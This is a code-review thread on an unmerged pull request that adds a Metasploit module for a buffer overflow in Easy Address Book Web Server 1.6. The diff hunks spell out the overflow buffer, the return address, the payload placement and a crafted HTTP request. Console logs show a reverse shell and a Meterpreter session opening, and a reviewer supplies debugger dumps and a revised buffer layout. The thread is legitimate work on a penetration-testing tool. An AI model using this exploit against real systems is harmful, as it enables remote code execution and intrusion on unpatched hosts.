### PR TITLE
Easy Adress Book Web Server 1.6 User ID Buffer Overflow Exploit Add

### PR DESCRIPTION
**Pull request by MuhammetDilmac**
Easy Adress Bok Web Server 1.6 User ID Buffer Overflow Exploit Add.

### CODE REVIEW

**Comment by espreto** [comment]
You can look this [module](https://github.com/rapid7/metasploit-framework/pull/5897) and notes and change to the correct standards.

**Comment by MuhammetDilmac** [comment]
Thank you @espreto how can controll correct standart before pr?

**Comment by espreto** [comment]
@MuhammetDilmac Take a look: https://github.com/rapid7/metasploit-framework/wiki

**Comment by MuhammetDilmac** [comment]
Thank you @espreto

**Comment by MuhammetDilmac** [comment]
@espreto what is the last error?
Error output:
```
Module should not be marked executable
```
I don't understant to error

**Comment by void-in** [comment]
@MuhammetDilmac The module file need to have a permission of 644 which you can change through the chmod command in Linux. However, there are a bunch of issues with this PR. You don't have to create the HTTP request on line 64. You can use the send_request_cgi function to do that. Take a look at https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient

**Comment by MuhammetDilmac** [comment]
Finally pass test! :)

File: modules/exploits/windows/http/easy_adress_book_web_server.rb [hunk 1]
```diff
@@ -0,0 +1,84 @@
...
+    req  = "GET //addrbook.ghp? HTTP/1.1\r\n"
+    req += "User-Agent: Mozilla/4.0\r\n"
+    req += "Host: #{host}:#{port}\r\n"
+    req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+    req += "Accept-Language: en-us\r\n"
+    req += "Accept-Encoding: gzip, deflate\r\n"
+    req += "Referer: http://#{host}/\r\n"
+    req += "Cookie: SESSIONID=1337; UserID=#{buf}; PassWD=;\r\n"
+    req += "Conection: Keep-Alive\r\n\r\n"
+    print_status("Request made. Request length is #{req.length} byte.")
```
Comment (void-in) [inline modules/exploits/windows/http/easy_adress_book_web_server.rb]: This is not the way GET requests are generated by the framework. You need to use send_requenst_* methods. Take a look at https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient. If you have problem using these methods, please let us know. The module can't be landed in its current form.

**Comment by MuhammetDilmac** [comment]
Hello @void-in, 
HTTP method not safe using this exploit. I don't known reason but not working with HTTPClient...

**Comment by jvazquez-r7** [comment]
@MuhammetDilmac , @void-in it is probably due to the overflowing string containing HTTP request data. If it's the case the module should be carefully tested because there is some data in the request whose length is target dependent still (like the target host ip and target host port). 

@MuhammetDilmac what data from the request can not change to overflow correctly? If it's just the data in the cookie, then there is no reason to not use `HttpClient` as recommended by @void-in. If there is more data from the request, then it should be documented to avoid changes in the future.  Also to be sure which the module will work even when the target host ip / target host port length changes.

File: modules/exploits/windows/http/easy_adress_book_web_server.rb [hunk 2]
```diff
@@ -0,0 +1,84 @@
...
+      'Privileged'     => false,
+      'DisclosureDate' => 'Aug 28 2015',
+      'DefaultTarget'  => 0))
+      register_options( [  Opt::RPORT(80) ], self.class)
+  end
+
+  def exploit
+    connect
+
+    host = datastore['RHOST']
```
Comment (jvazquez-r7) [inline modules/exploits/windows/http/easy_adress_book_web_server.rb]: You don't need to do this, `Msf::Exploit::Remote::Tcp` already provides `rhost`

File: modules/exploits/windows/http/easy_adress_book_web_server.rb [hunk 3]
```diff
@@ -0,0 +1,84 @@
...
+    port = datastore['RPORT']
```
Comment (jvazquez-r7) [inline modules/exploits/windows/http/easy_adress_book_web_server.rb]: You don't need to do this, `Msf::Exploit::Remote::Tcp` already provides `rport`

File: modules/exploits/windows/http/easy_adress_book_web_server.rb [hunk 4]
```diff
@@ -0,0 +1,84 @@
...
+
+    print_status("Victim IP Adress: #{host} | Port: #{port}")
+
+    print_status("Preparing Buffer...")
+    buf  = "A" * target['Offset']
+    buf += [ target.ret ].pack('V')
+    buf += "A" * 20
```
Comment (jvazquez-r7) [inline modules/exploits/windows/http/easy_adress_book_web_server.rb]: This constant (20) should be documented

File: modules/exploits/windows/http/easy_adress_book_web_server.rb [hunk 5]
```diff
@@ -0,0 +1,84 @@
...
+    buf += payload.encoded
+    buf += "A" * (1111-(buf.length))
```
Comment (jvazquez-r7) [inline modules/exploits/windows/http/easy_adress_book_web_server.rb]: This constant 1111 should be documented

File: modules/exploits/windows/http/easy_adress_book_web_server.rb [hunk 6]
```diff
@@ -0,0 +1,84 @@
...
+    req += "Cookie: SESSIONID=1337; UserID=#{buf}; PassWD=;\r\n"
+    req += "Conection: Keep-Alive\r\n\r\n"
+    print_status("Request made. Request length is #{req.length} byte.")
+
+    print_status("Sending Request...")
+    sock.write(req)
+    sock.get_once
+    print_status("Sended Request!")
+
+    handler
```
Comment (jvazquez-r7) [inline modules/exploits/windows/http/easy_adress_book_web_server.rb]: You don't need to do this unless you are going to use `find` payloads

File: modules/exploits/windows/http/easy_adress_book_web_server.rb [hunk 7]
```diff
@@ -0,0 +1,84 @@
...
+    req += "Accept-Language: en-us\r\n"
+    req += "Accept-Encoding: gzip, deflate\r\n"
+    req += "Referer: http://#{host}/\r\n"
+    req += "Cookie: SESSIONID=1337; UserID=#{buf}; PassWD=;\r\n"
+    req += "Conection: Keep-Alive\r\n\r\n"
+    print_status("Request made. Request length is #{req.length} byte.")
+
+    print_status("Sending Request...")
+    sock.write(req)
+    sock.get_once
```
Comment (jvazquez-r7) [inline modules/exploits/windows/http/easy_adress_book_web_server.rb]: Do you really need to read the answer? Looks like the request is overflowing so not sure if there is going to be even response.

File: modules/exploits/windows/http/easy_adress_book_web_server.rb [hunk 8]
```diff
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
```
Comment (jvazquez-r7) [inline modules/exploits/windows/http/easy_adress_book_web_server.rb]: It shouldn't be `ExcellentRanking`. With the module as is `NormalRanking` should be used.

https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking

**Comment by MuhammetDilmac** [comment]
@jvazquez-r7 thank you, I'll send back the correct ones :)

**Comment by wchen-r7** [comment]
Have you tested on a Windows 7 (32-bit) box before?

In most cases, this is what I get:

```
msf exploit(easy_adress_book_web_server) > rerun
[*] Reloading module...

[*] Started reverse handler on 192.168.1.64:4444 
[*] Victim IP Adress: 192.168.1.188 | Port: 8889
[*] Preparing Buffer...
[*] Buffer made. Buffer length is 1111 byte.
[*] Preparing Request...
[*] Request made. Request length is 1421 byte.
[*] Sending Request...
[-] Exploit failed: EOFError EOFError
msf exploit(easy_adress_book_web_server) > 
```

occasionally, i see this, but I don't actually get a session:

```
msf exploit(easy_adress_book_web_server) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Victim IP Adress: 192.168.1.188 | Port: 8888
[*] Preparing Buffer...
[*] Buffer made. Buffer length is 1111 byte.
[*] Preparing Request...
[*] Request made. Request length is 1421 byte.
[*] Sending Request...
[*] Sending stage (885806 bytes) to 192.168.1.188
[*] Sended Request!
```

**Comment by MuhammetDilmac** [comment]
@wchen-r7 yes, i test it but 3 or 4 try after exploit.

```
msf exploit(easy_adress_book_web_server) > exploit

[*] Started reverse handler on 192.168.147.130:1111 
msf exploit(easy_adress_book_web_server) > exploit

[*] Started reverse handler on 192.168.147.130:1111 
msf exploit(easy_adress_book_web_server) > exploit

[*] Started reverse handler on 192.168.147.130:1111 
msf exploit(easy_adress_book_web_server) > exploit

[*] Started reverse handler on 192.168.147.130:1111 
msf exploit(easy_adress_book_web_server) > exploit

[*] Started reverse handler on 192.168.147.130:1111 
msf exploit(easy_adress_book_web_server) > exploit

[*] Started reverse handler on 192.168.147.130:1111 
[*] Sending stage (885806 bytes) to 192.168.147.129
[*] Meterpreter session 1 opened (192.168.147.130:1111 -> 192.168.147.129:49249) at 2015-10-09 14:13:02 +0300
```

I'm send new pr. Plase try again

**Comment by wchen-r7** [comment]
@MuhammetDilmac The exploit sort of works for me, but not so reliable. I started debugging this a little bit, and it looks like the address you're trying to return to (with the pop-pop-ret) isn't the best choice.

Here's the buffer I am testing based on my analysis:

```ruby
    buf = "A" * 64      # 64 bytes for var_DE64
    buf << "BBBB"       # We start overwriting var_DE24 buffer here
    buf << "C" * (16-4) # Padding for [ESI+10h] so the 16th DWORD is our DDDD
    buf << "DDDD"       # EDX (which will be used by the CALL DWORD [edx+28h] instruction)
    buf << "E" * (4 * 100) # Extra padding so we can see the overflow better
```

This buffer allows me to overwrite EDX precisely for the CALL instruction at the time of the crash, and do more inspection for it:

```
0:006> r
eax=00000000 ebx=00000000 ecx=01b2b4e4 edx=44444444 esi=01b2b4d4 edi=01b2b4e4
eip=0043ec52 esp=01b2b430 ebp=ffffffff iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
abws+0x3ec52:
0043ec52 ff5228          call    dword ptr [edx+28h]  ds:0023:4444446c=????????
```

At this crash, ESP looks like this:

```
0:006> dd esp
01b2b430  00000000 00000000 01b4766c 01b2b4d4
01b2b440  00000000 0043eb2a 015b044d 01b2b4d4
01b2b450  01b392ec 004e348c 00000003 004101aa
01b2b460  01b4766c 00000001 01b47870 01b4780e
01b2b470  0178e1b8 015bff88 0178e258 0178e208
01b2b480  00000000 01b4766c 00000000 00000000
01b2b490  00000001 41414141 41414141 41414141
01b2b4a0  41414141 41414141 41414141 41414141
```

Since your target address is a pop-pop-ret, it would return to 01b4766c in this case. However, that address does not point to our buffer:

```
0:006> dd poi(esp+8)
01b4766c  004ef58c 00000000 00000000 01b475d4
01b4767c  01b475e4 00000000 0012d9b0 ffffffff
01b4768c  ffffffff 00000000 00000000 0178dc68
01b4769c  0178d588 0178d588 00000001 00122fd8
01b476ac  00518470 00518470 00518470 00518470
01b476bc  00518470 00518470 00518470 00518470
01b476cc  00000000 00000000 00518470 00518470
01b476dc  00518470 00518470 00518470 00518470
```

Some of your data can be found somewhere there, but not reliable for a pop-pop-ret:
https://gist.github.com/wchen-r7/d5a1fbd08923ea47ddc3

So I guess that's where the problem is for the exploit. I would try to look around more and maybe find a different pointer, or find a way to gain predicable heap allocations and store your payload there, that way you can always jump to it (basically like heap spraying).

**Comment by bcook-r7** [comment]
This should probably move to unstable.

**Comment by MuhammetDilmac** [comment]
First of all, thanks for your all feedback and help. Sorry for the late answer. I'm not developer for this exploit, i make only porting. Therefore this pr close please :) I'm another exploit porting metasploit soon :)

**Pull request closed without merging**